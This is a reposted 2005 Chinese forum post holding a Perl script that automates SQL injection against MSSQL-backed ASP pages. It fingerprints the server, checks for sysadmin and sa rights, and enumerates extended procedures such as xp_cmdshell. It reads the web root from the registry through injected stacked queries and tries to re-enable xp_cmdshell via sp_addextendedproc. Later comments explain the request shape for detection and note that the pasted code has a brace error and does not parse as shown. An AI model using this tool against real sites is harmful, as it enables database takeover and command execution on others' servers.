[转载]get mssql injection more info.pl
本文作者:lanker文章出处:[url]www.cnwill.com[/url]
文章性质:原创
发布时间:2005-01-06
很久以前写的，得知有注射后，可以用它得到很多基本信息、权限、扩展之类的，还有绝对路径。
代码:
--------------------------------------------------------------------------------
#!/usr/bin/perl
#codz by lanker 2004/3/27
# Our Team :[url]www.cnwill.com[/url]|[url]www.nmsafe.net[/url]
#use get mssql injection more info
#thx ≯Super·Hei
# Top-level driver.  There is no `use strict`/`use warnings`, so every
# variable below is a package global; $host and $port are also read by
# sendraw() and make_request() further down.
# Usage: host port injectable-path marker.  Each probe appends a SQL
# fragment to the path, fetches the page through sendraw() and counts the
# response lines that contain the marker; a hit is taken to mean the
# injected condition held.  From a detection standpoint every request has
# the same shape: an HTTP/1.0 POST carrying only a Host header, whose query
# string ends in "%20and%201=(select%20...);--" or ";<statement>;--".
$|=1;
use Socket;
print "=======================================================================\n";
print " Codz By lanker <nmlanker\@163.com> \n";
print " My blog:[url]http://www.hackblog.com/blog.asp?name=lanker[/url] \n";
print "=======================================================================\n";
# Exactly four positional arguments are required.
my $ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 81 /qc/list.asp?unid=2 测试成功\n";
exit;
}
$host=$ARGV[0];
$port=$ARGV[1];
$path=$ARGV[2];
$flag=$ARGV[3];   # marker text; interpolated unescaped into the greps below, so regex metacharacters in it are live
# Probe 1: compare the integer 1 with @@version.  Presumably the server's
# conversion error echoes the version string, since the only output is the
# response lines containing "Windows" (case-insensitive match).
$bug="$path%20and%201=(select%20\@\@version);--";
$req= make_request($bug);
@res=sendraw($req);
print "======================Getting OS Infomation==========================\n\n";
print "Find The OS Info:\n";
foreach $resline(@res) {
print $resline if $resline=~/\sWindows/isg;
}
# Probe 2: IS_SRVROLEMEMBER('sysadmin') = 1; marker present means sysadmin.
$qx="$path%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));--";
$req= make_request($qx);
@res=sendraw($req);
$size=grep /$flag/,@res;   # number of response lines matching the marker
if ($size > 0) {
print "Find IS_SRVROLEMEMBER : sysadmin\n";
}
else{
print "\aFind IS_SRVROLEMEMBER is not sysadmin\n";
}
# Probe 3: system_user = 'sa'.
$sa="$path%20and%20'sa'=(select%20system_user);--";
$req= make_request($sa);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "Find The User is SA\n";
}
else{
print "\aFind The User isn't SA\n";
}
# Payloads used by the two conditional sections further down.
# $exetend / $addexetend: count xp_cmdshell in master.dbo.sysobjects, and a
# stacked EXEC of sp_addextendedproc naming xplog70.dll.
$exetend="$path%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20xtype%20=%20'X'%20AND%20name%20=%20'xp_cmdshell');--";
$addexetend="$path%20;EXEC%20master.dbo.sp_addextendedproc%20'xp_cmdshell','xplog70.dll';--";
# $table / $wdata / $rpath / $deltable: create a scratch table nmlk, store the
# xp_regread result for the W3SVC "Virtual Roots" '/' value in it, compare
# that char column with the integer 1 (the same error-message trick as
# probe 1, presumably), then drop the table.
$table="$path;create%20table%20[dbo].[nmlk]%20([mnlk][char](255));--";
$wdata="$path;DECLARE%20\@result%20varchar(255)%20EXEC%20master.dbo.xp_regread%20'HKEY_LOCAL_MACHINE','SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual%20Roots',%20'/',%20\@result%20output%20insert%20into%20nmlk%20(mnlk)%20values(\@result);--";
$rpath="$path%20and%201=(select%20count(*)%20from%20nmlk%20where%20mnlk%20>%201);--";
$deltable="$path;drop%20table%20nmlk;--";
print "\n===================Getting The Stored Procedures=====================\n\n";
# Probe each name in master.dbo.sysobjects; names that produce a marker hit
# are appended to @ex in this list's order.  The positional tests on @ex
# below ($ex[0], $ex[1], $ex[2]) therefore depend on that order.
@exentend=('xp_regread','sp_makewebtask','xp_cmdshell','xp_regwrite','xp_regdeletevalue','xp_regdeletekey','xp_loginconfig','xp_logininfo','xp_msver','xp_enumdsn','xo_enumgroups','xp_servicecontrol','xp_terminate_process');
foreach $exent(@exentend) {
$rqexent="$path%20and%201=(SELECT%20count(*)%20FROM%20master.dbo.sysobjects%20WHERE%20name%20=%20'$exent');--";
$req= make_request($rqexent);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "YeYe!!Find:$exent\n";
push @ex,$exent;
}
}
# Web-path section: only entered when the first two hits are exactly
# xp_regread then sp_makewebtask (sp_makewebtask itself is never used).
if ($ex[0] eq 'xp_regread' && $ex[1] eq 'sp_makewebtask'){
print "\n=======================Getting The Web Path Now======================\n\n";
sleep(2);   # the sleeps only pace the requests
$req= make_request($table);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size > 0) {
print "Create Table ... Ok!!\n";
sleep(1);
$req= make_request($wdata);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size > 0) {
print "Write The Data ... Ok!!\n";
sleep(1);
$req= make_request($rpath);
@res=sendraw($req);
print "Get The WEB Path:";
# Only a Chinese-language SQL Server error text ("char 值 ... 转换") is
# recognised; a server with English messages prints nothing here.
foreach $tmpline (@res) {
if($tmpline=~/char 值.*转换/isg) {
# Take the text between the first two single quotes, strip spaces,
# and print the part before the first comma.
($s1,$s2,$s3)=split(/'/,$tmpline);
$s2=~s/ //isg;
($ss1,$ss2,$ss3)=split(",",$s2);
print "$ss1\n";
}
}
sleep(1);
$req= make_request($deltable);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "Drop The Temp Table ... Ok!!\n";
}
else {
print "Drop The Temp Table ... Faile!!\n";
exit;
}
}
else {
print "Write The Data ... Faile!!\n";
exit;
}
}
else {
print "Getting The WEB Path ... Faile!!\n";
exit;
}
# NOTE(review): as pasted, this `else` directly follows the else block that
# ends on the line above (if/else/else), which Perl does not parse; the
# forum copy appears to have lost a brace somewhere in this section.  It is
# presumably meant as the fallback of the xp_regread/sp_makewebtask test.
else {
print "Can't acquire the path!\n";
}
# If xp_cmdshell was not the third hit, send the sp_addextendedproc payload
# and then re-run the xp_cmdshell count; only the second response is
# inspected.
if ($ex[2] ne 'xp_cmdshell') {
print "Test Used xplog70.dll Return xp_cmdshell ....";
sleep(3);
$req= make_request($addexetend);
@res=sendraw($req);
$req= make_request($exetend);
@res=sendraw($req);
$size=grep /$flag/,@res;
if ($size>0) {
print "Succeevd !!\n";
# The foreach above localised the undeclared loop variable, so $exent has
# reverted to its pre-loop value (undef) by the time this push runs.
push @ex,$exent;
}
else{
print "Faile !!\n";
}
}
}   # closes the xp_regread/sp_makewebtask `if` (see the NOTE above)
# Send one raw request to the script-level $host:$port and return every
# response line, reading until the server closes the connection.
# Argument: the request text produced by make_request().
# Dies on name resolution, socket creation or connect failure; no caller
# wraps this in eval, so such a failure ends the whole script.
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host) || die("inet_aton problems\n");
# Bareword global handle S: one connection at a time per process.
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
# Hand-packed sockaddr_in: family 2 (AF_INET) as a native short, the port as
# a network-order short, the 4 address bytes, then 8 bytes of padding.
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);       # make S the default output handle for the bare print below
$| = 1;          # autoflush applies to the selected handle, i.e. S
print $req;
my @res = <S>;   # list context: every line until EOF
select(STDOUT);  # restore the default output handle before returning
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}
sub make_request
{
    # Build the raw HTTP/1.0 request for one probe: a POST request line for
    # the given path (query string included), a Host header taken from the
    # script-level $host, and the blank line that ends the header block.
    # No Content-Length is sent, so the request carries no body.
    my ($target_path) = @_;
    my @header_lines = (
        "POST $target_path HTTP/1.0",
        "HOST:$host",
        '',
        '',
    );
    return join "\r\n", @header_lines;
}